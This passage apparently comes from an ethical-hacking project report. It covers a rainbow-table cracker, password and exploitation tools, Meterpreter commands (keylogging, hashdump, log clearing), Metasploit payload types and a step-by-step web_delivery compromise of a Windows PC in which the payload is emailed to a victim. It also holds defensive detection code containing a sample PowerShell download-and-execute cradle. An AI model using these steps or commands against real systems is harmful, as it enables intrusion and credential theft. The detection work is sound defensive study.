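ALPHABET = string.ascii_lowercase
PW_LEN = 4
KEYSPACE = len(ALPHABET) ** PW_LEN   # 26^4 = 456,976 candidates (toy size, an assumption)

def index_to_password(idx: int) -> str:
    chars = []
    for _ in range(PW_LEN):
        idx, r = divmod(idx, len(ALPHABET))
        chars.append(ALPHABET[r])
    return "".join(chars)

def md5(password: str) -> bytes:
    return hashlib.md5(password.encode()).digest()

def reduce_fn(digest: bytes, column: int) -> str:
    """Map a digest back into the keyspace. Mixing in the column index gives every column a
    different reduction, which is what makes this a rainbow table rather than a Hellman table:
    two chains that collide in different columns do not merge."""
    return index_to_password((int.from_bytes(digest[:8], "big") + column) % KEYSPACE)

class RainbowTable:
    def __init__(self, chains: int, length: int, seed: int = 12345):
        self.length = length
        self.starts = []
        self.ends = {}                        # end password -> list of chain starts
        idx = seed
        for _ in range(chains):               # precomputation: only (start, end) is kept
            start = index_to_password(idx % KEYSPACE)
            pw = start
            for column in range(length):
                pw = reduce_fn(md5(pw), column)
            self.starts.append(start)
            self.ends.setdefault(pw, []).append(start)
            idx = (idx * 1103515245 + 12345) % KEYSPACE   # LCG: de terministic spread of starts

    def chain_member(self, start: str, column: int) -> str:
        """Password at position `column` of the chain beginning at `start` (column 0 = start)."""
        pw = start
        for c in range(column):
            pw = reduce_fn(md5(pw), c)
        return pw

    def _walk(self, start: str, target: bytes):
        pw = start
        for column in range(self.length):
            if md5(pw) == target:
                return pw
            pw = reduce_fn(md5(pw), column)
        return None

    def lookup(self, target: bytes):
        """Guess that the target sits at column k, finish the chain from there and check whether
        that end is stored; if so, regenerate the chain from its start to find the preimage.
        Later columns are tried first because they are the cheapest to finish."""
        for k in range(self.length - 1, -1, -1):
            pw = reduce_fn(target, k)
            for column in range(k + 1, self.length):
                pw = reduce_fn(md5(pw), column)
            for start in self.ends.get(pw, []):
                found = self._walk(start, target)
                if found is not None:
                    return found
        return None

SAMPLE_TABLE = RainbowTable(chains=1000, length=100)

if __name__ == "__main__":
    victim = SAMPLE_TABLE.chain_member(SAMPLE_TABLE.starts[7], 23)   # a password the table covers
    print(victim, SAMPLE_TABLE.lookup(md5(victim)))
```

The table stores 1,000 endpoint pairs but covers up to 100,000 passwords, and a lookup costs at most about length²/2 hash operations instead of a scan of the whole keyspace; coverage is probabilistic, so a hash not on any chain simply returns `None`. Per-user salting defeats the trade-off completely, because a table would have to be built per salt.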

15) IKECrack:

IKECrack is an open-source IKE/IPsec authentication cracking tool. It brute-forces or dictionary-attacks
the pre-shared key used for IKE Aggressive Mode authentication.

Features:

 Attacks the pre-shared key of IKE Aggressive Mode, where the responder's authentication hash is
sent before any encryption is in place
 In Aggressive Mode the initiating client sends its encryption proposal, Diffie-Hellman public value,
nonce and ID in an unencrypted packet to the gateway/responder; the responder's reply carries a hash
computed over these values with the pre-shared key, which IKECrack attacks offline
 Freely available for both personal and commercial use

16) IronWASP:

IronWASP is open-source web application vulnerability testing software. It is designed to be
customisable so that users can build their own security scanners with it.

Features:

 GUI based and very easy to use
 Powerful and effective scanning engine
 Supports recording of login sequences
 Reporting in both HTML and RTF formats
 Checks for over 25 types of web vulnerabilities
 Support for detecting false positives and false negatives
 Supports Python and Ruby
 Extensible with plugins or modules written in Python, Ruby, C# or VB.NET

17) Medusa:

Medusa is one of the fastest online brute-force password crackers: a speedy, parallel, modular login
brute-forcer for network services. It is widely used in ethical hacking.

Features:

 Designed to be a speedy, massively parallel, modular login brute-forcer
 Aims to support as many services that allow remote authentication as possible (SSH, FTP, HTTP,
SMB, MySQL, VNC and others)
 Thread-based parallel testing and brute-force testing
 Flexible user input, which can be specified in a variety of ways
 Every service module exists as an independent .mod file
 No modifications to the core application are needed to extend the list of services supported for
brute-forcing

18) NetStumbler:

NetStumbler is used to detect wireless networks on the Windows platform.

Features:

• Verifying network configurations
• Finding locations with poor coverage in a WLAN
• Detecting causes of wireless interference
• Detecting unauthorized ("rogue") access points
• Aiming directional antennas for long-haul WLAN links

19) SQLMap:

SQLMap automates the process of detecting and exploiting SQL injection weaknesses. It is open
source and cross-platform.

It supports the following database engines:

I. MySQL
II. Oracle
III. PostgreSQL
IV. MS SQL Server
V. MS Access
VI. IBM DB2
VII. SQLite
VIII. Firebird
IX. Sybase and SAP MaxDB

It supports the following SQL injection techniques:

I. Boolean-based blind
II. Time-based blind
III. Error-based
IV. UNION query
V. Stacked queries and out-of-band

20) Cain & Abel:

Cain & Abel is a password recovery tool for Microsoft operating systems. It is used to recover MS
Access passwords, uncover password fields, sniff networks, and crack encrypted passwords using
dictionary, brute-force, and cryptanalysis attacks.

21) Nessus:

Nessus can be used to perform the following actions:

• Remote vulnerability scanning
• Password dictionary attacks
• Denial of service attacks

It is closed source, cross-platform and free for personal use.

Chapter-IV

IMPLEMENTATION

Commands for Metasploit's Meterpreter:

Core Commands:

At its most basic, Meterpreter behaves like a Linux terminal on the victim's computer. As such, many
basic Linux commands can be used in Meterpreter even when the target runs Windows or another
operating system.

Here are some of the core commands we can use in Meterpreter:

• ? - help menu
• background - moves the current session to the background
• bgkill - kills a background Meterpreter script
• bglist - provides a list of all running background scripts
• bgrun - runs a script as a background thread
• channel - displays active channels
• close - closes a channel
• exit - terminates a Meterpreter session
• help - help menu
• interact - interacts with a channel
• irb - enters Ruby scripting mode
• migrate - moves the active process to a designated PID
• quit - terminates the Meterpreter session
• read - reads the data from a channel
• run - executes the Meterpreter script designated after it
• use - loads a Meterpreter extension
• write - writes data to a channel

File System Commands:

• cat - read and output to stdout the contents of a file
• cd - change directory on the victim
• del - delete a file on the victim
• download - download a file from the victim system to the attacker system
• edit - edit a file with vim
• getlwd - print the local directory
• getwd - print working directory
• lcd - change local directory
• lpwd - print local directory
• ls - list files in current directory
• mkdir - make a directory on the victim system
• pwd - print working directory
• rm - delete a file
• rmdir - remove directory on the victim system
• upload - upload a file from the attacker system to the victim

Networking Commands:

• ipconfig - displays network interfaces with key information including IP address, etc.
• portfwd - forwards a port on the victim system to a remote service
• route - view or modify the victim's routing table

System Commands:

• clearev - clears the event logs on the victim's computer
• drop_token - drops a stolen token
• execute - executes a command
• getpid - gets the current process ID (PID)
• getprivs - gets as many privileges as possible
• getuid - gets the user that the server is running as
• kill - terminates the process designated by the PID
• ps - lists running processes
• reboot - reboots the victim computer
• reg - interacts with the victim's registry
• rev2self - calls RevertToSelf() on the victim machine
• shell - opens a command shell on the victim machine
• shutdown - shuts down the victim's computer
• steal_token - attempts to steal the token of a specified process (PID)
• sysinfo - gets details about the victim computer such as OS and name

User Interface Commands:

• enumdesktops - lists all accessible desktops
• getdesktop - gets the current Meterpreter desktop
• idletime - checks how long the victim system has been idle
• keyscan_dump - dumps the contents of the software keylogger
• keyscan_start - starts the software keylogger when associated with a process such as Word
or a browser
• keyscan_stop - stops the software keylogger
• screenshot - grabs a screenshot of the Meterpreter desktop
• set_desktop - changes the Meterpreter desktop
• uictl - enables control of some of the user interface components

Password Dump Commands:

• hashdump - grabs the hashes in the password (SAM) file
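Two of the behaviours described on this page leave well-known traces in the Windows event logs: an online brute-forcer such as Medusa (section 17) produces a burst of failed logons (event 4625) from one source, and Meterpreter's clearev leaves event 1102 (Security audit log cleared) and event 104 (System log cleared) as the first entries of the freshly emptied logs. The following is an added detection example written for this page, not code from Metasploit or Medusa; the flat "timestamp event-id key=value" line format, the sample events, the threshold and the window are assumptions standing in for a SIEM export.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample():
    """Constructed events (assumption: not real logs). Ten failed logons from one source
    in under 30 seconds, one stray failure elsewhere, a later success, then log clearing."""
    lines = [f"2024-05-01T10:00:{s:02d}Z 4625 src=10.0.0.5 user=bob logon_type=3"
             for s in range(0, 30, 3)]
    lines += [
        "2024-05-01T10:03:00Z 4625 src=10.0.0.9 user=carol logon_type=2",
        "2024-05-01T10:04:10Z 4624 src=10.0.0.5 user=bob logon_type=3",
        "2024-05-01T10:20:00Z 1102 src=- user=bob logon_type=-",
        "2024-05-01T10:20:01Z 104 src=- user=bob logon_type=-",
    ]
    return "\n".join(lines)


def parse_events(text):
    """Parse 'ISO-timestamp event-id key=value ...' lines into dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, eid, *kvs = line.split()
        fields = dict(kv.split("=", 1) for kv in kvs)
        events.append({"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
                       "id": int(eid), **fields})
    return events


def detect_logon_bursts(events, threshold=8, window=timedelta(seconds=60)):
    """Return sources that produced >= threshold failed logons (4625) within any
    sliding window of the given length; a user being wrong twice never trips it."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            by_src[e["src"]].append(e["ts"])
    flagged = []
    for src, times in by_src.items():
        times.sort()
        left = 0
        for right, t in enumerate(times):
            while t - times[left] > window:
                left += 1
            if right - left + 1 >= threshold:
                flagged.append(src)
                break
    return sorted(flagged)


def detect_log_clearing(events):
    """1102 (Security audit log cleared) and 104 (System log cleared) survive a wipe
    because Windows writes them into the new, empty log; report them with the actor."""
    return [(e["ts"].isoformat(), e["id"], e["user"])
            for e in events if e["id"] in (1102, 104)]


def success_after_burst(events, burst_sources):
    """Escalate: a 4624 success from a source that was just brute-forcing is the
    strongest signal that a password was actually found."""
    return sorted({e["src"] for e in events
                   if e["id"] == 4624 and e["src"] in burst_sources})


if __name__ == "__main__":
    ev = parse_events(build_sample())
    bursts = detect_logon_bursts(ev)
    print("brute-force sources:", bursts)                               # ['10.0.0.5']
    print("succeeded after burst:", success_after_burst(ev, bursts))   # ['10.0.0.5']
    print("log clearing:", detect_log_clearing(ev))                    # 1102 then 104 by bob
```

The burst detector keys on the source rather than the account so that password spraying (one guess across many users) is caught as well as a single-account attack, and the log-clearing check needs no baseline at all: a 1102 or 104 that was not produced by a scheduled maintenance job is worth an immediate look.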

Metasploit Framework:

Metasploit is an exploitation framework that every hacker should be knowledgeable of and skilled
at. It is one of my favorite hacking tools available.

Metasploit enables us to use pre-written exploits against known vulnerabilities in operating
systems, browsers and other applications and to place a rootkit/listener/payload on the target system.
These payloads are what enable us to connect to the victim system and use it as our own after we
have exploited a vulnerability in its system. In this tutorial, we will look exclusively at the payloads
built into Metasploit.

Metasploit has many types of payloads we can leave on the target system. We are most familiar
with the generic/shell/reverse_tcp and the windows/meterpreter/reverse_tcp payloads, having
used those in multiple hacks already. In this guide, we will look at how the payloads
work, how Metasploit categorizes the payloads, and what the types of payloads are. I hope this
understanding will help you to better choose the appropriate payload for your hack.

Steps to use the Metasploit Framework:

Step 1:

Fire Up Kali Linux & Open Metasploit

When we open the Metasploit console in Kali Linux, we immediately see that Metasploit lists the
number of exploits, auxiliary modules, post-exploitation modules, payload modules, encoders, and
nops.

In the screenshot below, notice that there are 335 payloads in the current version of Metasploit
(yours may be slightly different based upon your version of Metasploit). This is a huge number of
payloads that can be used for multiple situations.

When we type:

msf > show payloads

Metasploit lists all 335 payloads as below.

Step 2:

Types of Payloads:

Among these 335 payloads in Metasploit, there are 8 types of payloads.

Inline:

These payloads are a single package of exploit and payload. They are inherently more stable, but because
of their size, they can't always be used in small vulnerable memory areas.

Staged:

These payloads are able to fit into very small spaces, create a foothold on the system and
then pull in the rest of the payload.

Meterpreter:

This is the all-powerful payload that we most often want on a victim system. It works by DLL injection and
resides entirely in memory, leaving no trace of its existence on the hard drive or file system. It has a
number of specific commands and scripts developed for it, enabling us to largely work our will on the
victim system.

PassiveX:

This payload is for use when firewall rules restrict outbound traffic. In essence, it uses ActiveX through
Internet Explorer to hide its outbound traffic and evade the firewall by using HTTP requests and responses
just as any browser would.

NoNX:

In some CPUs, there is a built-in security feature called DEP (Data Execution Prevention). In Windows, it is
referred to as No eXecute, or NX. The idea behind this security feature is to keep data from making its way
to the CPU and being executed. The NoNX payloads are designed to evade this safety feature of modern
CPUs.

Ord:

This type of payload works on nearly all Windows operating systems. They are extremely small, but
somewhat unstable. They are dependent upon loading a .dll (dynamic link library) into the exploited
process.

IPv6:

These payloads, as their name implies, are designed to work on IPv6 networks.

Reflective DLL Injection:

These payload modules are injected directly into the target process while it is running in memory, thereby
never writing anything to the hard drive and leaving little or no evidence behind.

Step 3:

Payload Modules:

If we look in the Metasploit directory from the Linux terminal in Kali, we can see that Metasploit categorizes its
payloads into three different types. Obviously, the eight types above are consolidated into these three
directories in Metasploit.

kali > cd /usr/share/metasploit-framework/modules/payloads

kali > ls -l

Staged:

Staged payloads use tiny stagers (see below) to fit into small exploitation spaces. In other words, if the
victim's system exploitation buffer or other memory area is very small and only allows a small amount of
code to be executed, first a small stager is placed in the memory area. The stager then "pulls" the rest of
the payload after this foothold is made on the victim system.

These larger staged payloads include such complex payloads as the Meterpreter and VNC Injection, both of
which include large and complex code. Generally, a staged payload will split the name of the payload
with a "/", such as in the payload windows/shell/tcp_bind. The "tcp_bind" is the stager (see below)
and "shell" is the stage.

Unfortunately, this convention is not used consistently in Metasploit, so one often has to go to the "info"
section of the payload or find the directory it is in to determine if it is a staged payload.

Stagers:

Stagers are the small payloads whose only job is to fit into small memory area and then "pull" the larger
staged payload along. They kind of "plant the flag" on the victim and then enable the larger payload to be
loaded.

Singles:

Often referred to as "inline payloads," singles are self-contained units that do not require a stager. They are
generally more stable and preferred, but many times the code is too large for the vulnerable memory
area on the victim system.

Let's now take a look inside that singles directory.

kali > cd singles

kali > ls -l

As we can see, the singles are broken down by vulnerable platform. If we want to see the singles available
for the Windows platform, we simply type:

kali > cd windows

kali > ls -l

Inside this directory we can see all the singles payloads available for Windows. I have highlighted one of
these payloads, shell_reverse_tcp, that we have used in many of our hacks.

Payloads are a key part of the Metasploit infrastructure and provide us with access once the exploit has been
completed. The better we understand them, the better we will be as hackers.

• Social Engineering refers to the psychological manipulation of people into performing actions or
divulging confidential information in order to gain access to a system, network or physical location, or
for financial gain.

• Using vulnerabilities: in this method we use system vulnerabilities (weaknesses) to exploit the system and
gain access.

Basic Hacking Process:

• Information Gathering
• Scanning
• Gaining Access
• Maintaining Access
• Clearing tracks

An OS can be hijacked by following 3 main steps:

• Information Gathering
• Setting the payload
• Exploiting

STEPS FOR WINDOWS HACKING:

• Open Kali Linux
• Open a terminal
• Type ifconfig in the terminal to find our IP address
• Now type netdiscover in the terminal to make sure that the victim is alive.
• The above figure shows the number of devices present in the network
• Now type msfconsole in the terminal to open the Metasploit framework
• Now type web_delivery in msfconsole to get the exploit path
• Copy the resulting URL or path, i.e., exploit/multi/script/web_delivery
• Now type "use exploit/multi/script/web_delivery" to use that path
• Now set SRVHOST, LHOST and URIPATH as shown in the figure below
• Now set payload to set the payload (RAT)
• Type show targets to show all the targets
• Now select the 2nd option, i.e., PSH (PSH means PowerShell)
• Now copy the payload present in the root folder, create the executable file in Notepad and send it
to the victim's computer via email attachment or in some other manner.
• Now type exploit -j
• This will display a command on the console which should be run on the victim system.
• After the victim opens the file, sessions are created as below:
• Use sessions -i <session id> to enter the session as shown above
• After successfully entering the session, check the info to get details about the victim system
• Thus we have successfully hacked a Windows 7 PC.

• Here are some of the commands that can be used:
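The web_delivery steps above hand the target a PowerShell one-liner that fetches and runs the stage in memory, which is exactly what PowerShell script block logging (event 4104) records on the endpoint. As an added example from the defender's side (written for this page, not Metasploit's code), the block below classifies constructed ScriptBlockText samples with a few rules that fire on download-and-execute cradles, hidden windows and long encoded commands; the samples, the rule set and the scoring are assumptions, and the address in the sample uses the RFC 5737 documentation range.

```python
import re

# Constructed ScriptBlockText samples with the verdict we expect (assumption: shaped like
# PowerShell event 4104 payloads, not commands copied from the page or any tool's output).
SAMPLES = [
    ("benign", r"Get-ChildItem C:\Users\alice\Documents | Where-Object Length -gt 1MB"),
    ("benign", "Invoke-WebRequest https://updates.example.com/manifest.json -OutFile manifest.json"),
    ("suspicious", "powershell.exe -nop -w hidden -c \"IEX ((New-Object Net.WebClient).DownloadString('http://192.0.2.10:8080/x'))\""),
    ("suspicious", "powershell -NoProfile -EncodedCommand QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE="),
]

# Each rule names one feature of a download-and-execute stage; none is damning alone.
RULES = {
    # a fetched string handed straight to the interpreter
    "download_cradle": re.compile(
        r"\b(?:IEX|Invoke-Expression)\b.*\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b",
        re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.IGNORECASE),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/]{20,}={0,2}", re.IGNORECASE),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.IGNORECASE),
}

# Rules strong enough to flag on their own; the others only count in combination.
STRONG = {"download_cradle", "encoded_command"}


def match_rules(script_text):
    """Return the sorted names of every rule that fires on this script block."""
    return sorted(name for name, rx in RULES.items() if rx.search(script_text))


def classify(script_text):
    """'suspicious' if a strong rule fires or two weak ones do together, else 'benign'."""
    hits = match_rules(script_text)
    suspicious = bool(STRONG & set(hits)) or len(hits) >= 2
    return ("suspicious" if suspicious else "benign"), hits


def evaluate(samples=SAMPLES):
    """Run the classifier over labelled samples; returns (all_correct, per-sample results)."""
    results = [(expected, *classify(text)) for expected, text in samples]
    return all(exp == got for exp, got, _ in results), results


if __name__ == "__main__":
    ok, results = evaluate()
    for expected, verdict, hits in results:
        print(f"{expected:10s} -> {verdict:10s} {hits}")
    print("all samples classified as expected:", ok)
```

A plain Invoke-WebRequest that writes to disk stays benign because nothing is handed to the interpreter; the cradle rule needs both the fetch and the evaluation in one block, which is what separates an update script from a stager. In production the same rules would run over the ScriptBlockText field of 4104 events, with module and script block logging enabled by policy so that the text is recorded even when the command arrives encoded.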

Chapter-V

BIBLIOGRAPHY

PUBLICATIONS:
1. Tata McGraw-Hill.
2. Tutorial Point
BOOKS:
1. Joel Scambray, Stuart McClure, "Hacking Exposed Windows: Windows Security Secrets
& Solutions", Tata McGraw-Hill, 3rd Edition.
2. "Ethical Hacking", Tutorial Point Publishing.
WEBSITES:
1. http://udemy.com/
2. http://cybrary.com/